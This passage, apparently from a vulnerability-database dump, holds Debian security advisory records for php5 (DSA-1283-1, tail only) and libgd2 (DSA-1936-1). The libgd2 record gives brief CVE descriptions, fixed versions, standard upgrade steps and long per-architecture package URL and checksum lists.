http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 4669736 06867123b5c587cdd257c25267a915ba\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 2352816 35b23f59f0b4cf33be659e848dea3f0f\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 213830 706f8f950ee9dd21b5d430dc023a0f5d\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 24630 78b9b0bf40f6ec2b867869fd8404be1c\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 342160 951b225f949f01822cda5fb5480e59ad\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 33196 ab3a07545cb64b163b630a0402ed9fa2\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 33094 716e3d6eb0efe24834841dc8482fca58\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 16580 7770199fcbcd109ff1bb507828c1ee29\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 12622 c7f245a098902d3cbbfcf460b9e467bd\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 4864 7f48d43dfba182afa8a8ec6cf22446dc\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 62194 bfbc9b2fe29828efd5d197a832cf0046\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 31508 2f91aa3e2ec2e5b8a158380bff474093\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 47906 5bc7d9d871fa84107ef18cb5f173be7d\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 8266 1e7cbe58955ebab24af0286ec8aa9991\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 4638 34bafe072b3c670fcb47420849167f75\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 10762 995f2deaadbf94415ca384115a8079cd\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 32568 1d3c37dcb01d8e392c1134261315df36\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 17444 4563d23b67363895c73578373a431c6a\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 16236 7fd15f31a2c86668923fbff1d412c9ac\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 34904 3e3947e23398ea8c6c6d76cb7bc3b8ef\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch3_sparc.deb\n Size/MD5 checksum: 11674 1116cee789d3494e951f42ec534d38a7\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2007-04-29T00:00:00", "published": "2007-04-29T00:00:00", "id": "DEBIAN:DSA-1283-1:3DFD9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00039.html", "title": "[SECURITY] [DSA 1283-1] New php5 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-10-16T22:13:48", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1936-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nNovember 17, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : libgd2\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE Id : CVE-2007-0455 CVE-2009-3546\nDebian Bug : 408982 552534\n\nSeveral vulnerabilities have been discovered in libgd2, a library for\nprogrammatic graphics creation and manipulation. The Common \nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2007-0455\n\n Kees Cook discovered a buffer overflow in libgd2's font renderer. An\n attacker could cause denial of service (application crash) and \n possibly execute arbitrary code via a crafted string with a JIS\n encoded font. This issue only affects the oldstable distribution\n (etch).\n\nCVE-2009-3546\n\n Tomas Hoger discovered a boundary error in the "_gdGetColors()" \n function. An attacker could conduct a buffer overflow or buffer \n over-read attacks via a crafted GD file.\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 2.0.33-5.2etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.0.36~rc1~dfsg-3+lenny1.\n\nFor the upcoming stable distribution (squeeze) and the unstable\ndistribution ion (sid), these problems have been fixed in version\n2.0.36~rc1~dfsg-3.1.\n\nWe recommend that you upgrade your libgd2 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch2.diff.gz\n Size/MD5 checksum: 301479 d2f4b2221cb0e05063f85157711638c7\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz\n Size/MD5 checksum: 587617 be0a6d326cd8567e736fbc75df0a5c45\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch2.dsc\n Size/MD5 checksum: 988 c143f788dec8bc93ba7d80532600e09c\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_alpha.deb\n Size/MD5 checksum: 209706 350a29caa97e9308417968f4374fe4cb\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_alpha.deb\n Size/MD5 checksum: 211442 ac64343bcbd2196196af6b942a603dab\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_alpha.deb\n Size/MD5 checksum: 147620 9948cdf39afe83183bc1603cd90dd114\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_alpha.deb\n Size/MD5 checksum: 366996 c0f31c20c69d49d3cb5dadfa95bbf605\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_alpha.deb\n Size/MD5 checksum: 363262 76cc7a8c6e046be17f44b3dc6bfc6510\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_amd64.deb\n Size/MD5 checksum: 203508 9ee2e8faf2371ffd8893b6d9d2ec021b\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_amd64.deb\n Size/MD5 checksum: 341038 820d12d0f7f578add42fb3d13269d7f5\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_amd64.deb\n Size/MD5 checksum: 200610 cdf81aad23ab53b1d28723c1e50895c9\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_amd64.deb\n Size/MD5 checksum: 145376 1f20c829f68b560492c5f6cac3c0326d\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_amd64.deb\n Size/MD5 checksum: 342970 a8574f1ddb902aad8ebc4fab107d2210\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_arm.deb\n Size/MD5 checksum: 194452 9933342f1462e2fb3a91572fe81d6d08\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_arm.deb\n Size/MD5 checksum: 196524 291e331443613462a389a939f9c927ae\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_arm.deb\n Size/MD5 checksum: 144878 a232085eb902a52df464b7aba1aa2b30\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_arm.deb\n Size/MD5 checksum: 335830 a443f2cc96cb8c2e8ede402b6c7d70ff\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_arm.deb\n Size/MD5 checksum: 333636 827656208c3803187e0e8284dbdb2c85\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_hppa.deb\n Size/MD5 checksum: 206542 aaedbb6f18a46a19caa0b2af5622de1b\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_hppa.deb\n Size/MD5 checksum: 351368 95f241fab6f416957fb3a3545a132f6d\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_hppa.deb\n Size/MD5 checksum: 348440 b8b8601eaff99fe3fb01ba88452be1b6\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_hppa.deb\n Size/MD5 checksum: 148142 3ee9af605af8ca186f89e0669bfbacc8\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_hppa.deb\n Size/MD5 checksum: 209106 d2a75cf4dfc766239a8244cd5b3c671f\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_i386.deb\n Size/MD5 checksum: 198922 faa4e27f258d87a2d6716a1c7522ae96\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_i386.deb\n Size/MD5 checksum: 335496 c6374428f8f2fc3c56cca141fda12267\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_i386.deb\n Size/MD5 checksum: 197048 70de99f091a5ca73c3a9e14735a7f715\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_i386.deb\n Size/MD5 checksum: 143160 be7a5db664baec27428b8092acd942a9\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_i386.deb\n Size/MD5 checksum: 333956 16b228575857c08de542a1679bcde839\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_ia64.deb\n Size/MD5 checksum: 233854 59e84a2661507953240d01554d2f6801\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_ia64.deb\n Size/MD5 checksum: 149910 22f9401b0d41c4448d9165710575b639\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_ia64.deb\n Size/MD5 checksum: 381880 6f5d11e2181e4f32422000e30bb485fa\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_ia64.deb\n Size/MD5 checksum: 236402 d20da0972b2ce931db29ba0ef33c0227\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_ia64.deb\n Size/MD5 checksum: 379828 dcb320bbe14e14912c43e4ce6a87406c\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_mips.deb\n Size/MD5 checksum: 144530 29c23e7cf94df2dcce42da823ee2bac3\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_mips.deb\n Size/MD5 checksum: 199980 8e7890aabf93010d64d573e97e7b6325\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_mips.deb\n Size/MD5 checksum: 351366 fb84770d2b15b3d242af1ff9371cc004\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_mips.deb\n Size/MD5 checksum: 349002 83a8e560b2a0832fa3f7bd845b028888\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_mips.deb\n Size/MD5 checksum: 202576 4b614223b83ff9281d6abf0c96b95e84\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_mipsel.deb\n Size/MD5 checksum: 351598 8eb9fcda56c076e97b6b5ae4c3a5c684\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_mipsel.deb\n Size/MD5 checksum: 144656 d62007352274ddea4268b8daec3dfe06\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_mipsel.deb\n Size/MD5 checksum: 200114 a7acda3f2c85d11229ca80716708b292\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_mipsel.deb\n Size/MD5 checksum: 202610 6aba76b1fa6bf61e4f19b2c185caef40\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_mipsel.deb\n Size/MD5 checksum: 348938 446b111039f2abc5f18c0da2909dc6d2\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_powerpc.deb\n Size/MD5 checksum: 344170 99cb36b3f7e76c1611bc558da1f0b69f\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_powerpc.deb\n Size/MD5 checksum: 153630 bd6b37df3c6f865add4a7544ce6a3ed8\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_powerpc.deb\n Size/MD5 checksum: 346678 85768ccf84d18a46ec71b98de88d883a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_powerpc.deb\n Size/MD5 checksum: 201156 02559a9d66a4ba052fdbdb8865fb1178\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_powerpc.deb\n Size/MD5 checksum: 203254 697ec05f2c82870f3571de48ee1d4931\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 203820 2c0e1b8da57169cc27c68c02749e7fce\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 145288 e586279ab34b40581df878e8d54a5d00\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 206304 81286d7ef378f995064bda8985405176\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 344916 2b7dc027100094bcdfac3973ae42ec8a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_s390.deb\n Size/MD5 checksum: 341596 48fb7fd9410a6c56c7348ee58e44c0db\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 337040 3e570757ccbed59f81cc9635908dcf52\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 195478 5394f4b16849e0324bf8604cd96855fe\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 339032 c33f2dd72b9c4d9e0d9d296b2d76c8ae\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 144496 ed5d416ed606a7512fd23b640ef0d48f\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch2_sparc.deb\n Size/MD5 checksum: 197346 472999df848cf226b765a36f10cb01ae\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3+lenny1.dsc\n Size/MD5 checksum: 1612 861ee81768001cad3679f7e6b4c16268\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3+lenny1.diff.gz\n Size/MD5 checksum: 29122 ba98bcc559da7cfaf6af0269e6d6c973\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg.orig.tar.gz\n Size/MD5 checksum: 761899 0f4d2fa45627af0e87fcb74f653b66dd\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 236996 97687d52155c579eac4694129a3036b0\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 234324 888ccfbe94b37d807e520d17ba555373\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 389038 68e57a70ac9deeb88c32ded9f4d35db5\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 386062 d08f7a705d3b7853accb539322d93404\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_alpha.deb\n Size/MD5 checksum: 169056 0d8325242d90e9be315eceb4f4c3b2ce\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 226128 a341c0823799c1a17c57f3ab641ed9fc\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 363824 9f5ee16778aae72857045d83c24aa0a0\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 367104 c5d257e24617236b8a66ffebe49bc998\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 165016 35a7308138a071c9790b3c68071e67eb\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_amd64.deb\n Size/MD5 checksum: 228642 a923422ad1c829794894220d66e31ad8\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 218166 d01652ad19f739742c9ecd8bb4356c2e\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 360062 31b1b9c12e2e30d2a6da2bef039fac19\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 357534 69ba937ded46718124339895569eae97\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 165706 0017b28a56a67957aba834671b4ed04a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_arm.deb\n Size/MD5 checksum: 220304 d5a95205b1d4d63ef7910e1c66cc5064\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 220534 13e41fb531753eac4425352e489ac204\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 359206 f16a9f312a1661e6be8c2aef94d699df\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 361246 1d18d7e113b95b5f780fcbbc9e7fe801\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 222682 0f1b597856bd6c52fbb60ed0649f485a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_armel.deb\n Size/MD5 checksum: 166342 096ac81396b8664a2ed0280ea142a7d7\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 228220 094ed936f86c346642bae66be78fe4a5\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 230744 b96bb2333dcd2c415d7a6cdfa5c5c85c\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 371374 6f2e96e693804722d51efe17a7384c0a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 167492 ac52ea686398bbe6bb0050d7f23380c7\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_hppa.deb\n Size/MD5 checksum: 374120 8280bee041cda85b2d7590485668d4d7\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 358974 797889cfec6a71fbc8dea99014a22d5d\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 356634 8687049dc7503710e7b9798818ec10a0\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 222606 640114552f4d79220a99ed754bc8b149\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 220836 7fe4a8f4404f923bb3c2753c8801b945\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_i386.deb\n Size/MD5 checksum: 164292 877bc158847f598be3175fcf1caca555\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 262616 384ba9e56c2243fbf678cbd2066c421a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 407462 a281c696e7df4c6b28fb1d00d889ad4e\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 170536 91e3b8b3bdec6437e586ecad76448d7b\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 259726 a1419ac46090a5b3ac6fadc031c94361\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_ia64.deb\n Size/MD5 checksum: 404324 beaf8d3f61ac17a3e1f9f8ec0fb98f83\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 368870 3f8abbc6d77a5aad3fb30b47a5a159ca\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 222342 1e65ebf2348b44765b21fc2d50760d40\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 224514 b852f45244d7fc1da80ad7baf7faa7a3\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 166492 4209fb354092ffe728ad6c877bf5b53a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_mips.deb\n Size/MD5 checksum: 371392 cbd8852931c6b0e5217982e215f688f7\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 223660 0eff65fc6483e460c4e6c21ebaae951a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 373182 20190a16e9c743fe16f8a169e159ec8a\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 167336 fec0121ea4ddb045fb9aed273ebe3bbf\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 225550 f9bf5ad9cb2974b32d183e6f204f206d\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_mipsel.deb\n Size/MD5 checksum: 370838 e0959c73988a9c10fad4a9325d6332d6\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 177126 319718191c09c50f6fba336f043277b1\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 232182 740ccf088ae1cc6473b088dfa3afd897\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 367906 1c217aa962a581c638736677eb18d640\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 229860 bef4bcd55e5f91278ea889e782a08772\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_powerpc.deb\n Size/MD5 checksum: 370242 5eb51419b12f3d0a9e95cc1257256ed5\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 230344 e90c8c56df7081e36153be0c51d0596c\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 365176 5bfb3d0987d0cddcdb72a453fd7acd58\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 228024 4b902fd21e351d5ba17bfb3d90cb7289\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 167880 